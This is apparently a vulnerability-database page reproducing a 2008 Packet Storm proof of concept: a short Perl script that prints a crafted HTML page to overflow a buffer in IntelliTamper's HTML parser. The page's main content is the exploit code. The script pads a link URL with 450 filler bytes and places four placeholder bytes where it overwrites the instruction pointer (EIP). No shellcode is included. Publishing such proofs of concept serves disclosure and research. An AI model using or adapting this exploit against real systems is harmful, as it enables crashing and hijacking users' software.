Lucene search

K

intellitamper-poc.txt

๐Ÿ—“๏ธย 21 Jul 2008ย 00:00:00Reported byย k'sOSeTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 12ย Views

A Perl script for exploiting BOFs in IntelliTamper html parse

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`#!/usr/bin/perl  
#  
# k`sOSe - 07/21/2008  
#  
# This is NOT http://secunia.com/advisories/20172/.  
# There are some BOFs in the html parser, just put a properly  
# formatted html file in your website and launch IntelliTamper against it.  
  
use warnings;  
use strict;  
  
my $evil_html = '<html><head><title>ph33r</title></head><body>' .  
'<a href="http://google.it/' .  
"\x41" x 450 .  
"\x42" x 4 . # EIP  
'.htm">ph33r</a>' .  
"</body></html>";  
  
print $evil_html;  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
21 Jul 2008 00:00Current
7.4High risk
Vulners AI Score7.4
12
.json
Report